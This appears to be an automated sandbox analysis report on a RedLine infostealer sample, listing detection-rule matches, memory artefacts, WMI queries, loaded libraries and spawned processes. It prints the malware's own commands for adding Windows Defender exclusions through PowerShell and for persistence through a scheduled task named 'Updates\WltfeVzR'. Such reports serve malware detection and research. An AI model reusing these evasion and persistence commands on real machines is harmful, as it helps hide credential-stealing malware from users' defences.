                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: tfF3UBTdr8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: WltfeVzR.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, Lb5H43iY6A7OV1von7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile created: C:\Users\user\AppData\Roaming\WltfeVzR.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMutant created: \Sessions\1\BaseNamedObjects\xltcLKgmXVmRruxsLQFTtnWtWg
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8652.tmpJump to behavior
                    Source: tfF3UBTdr8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: tfF3UBTdr8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmp8CCB.tmp.16.dr, tmpC583.tmp.16.dr, tmpD7FD.tmp.9.dr, tmp7E54.tmp.9.dr, tmp366F.tmp.16.dr, tmpD83E.tmp.9.dr, tmp366E.tmp.16.dr, tmp6D9E.tmp.16.dr, tmp365C.tmp.16.dr, tmp8CDC.tmp.16.dr, tmp7E65.tmp.9.dr, tmp8CEE.tmp.16.dr, tmp8CED.tmp.16.dr, tmp365D.tmp.16.dr, tmp7E64.tmp.9.dr, tmpB48A.tmp.9.dr, tmp6D9D.tmp.16.dr, tmpD80E.tmp.9.dr, tmp7E42.tmp.9.dr, tmpD870.tmp.9.dr, tmpD86F.tmp.9.dr, tmpC584.tmp.16.dr, tmp7E53.tmp.9.dr, tmpD84E.tmp.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: tfF3UBTdr8.exeReversingLabs: Detection: 68%
                    Source: tfF3UBTdr8.exeVirustotal: Detection: 45%
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile read: C:\Users\user\Desktop\tfF3UBTdr8.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe C:\Users\user\AppData\Roaming\WltfeVzR.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
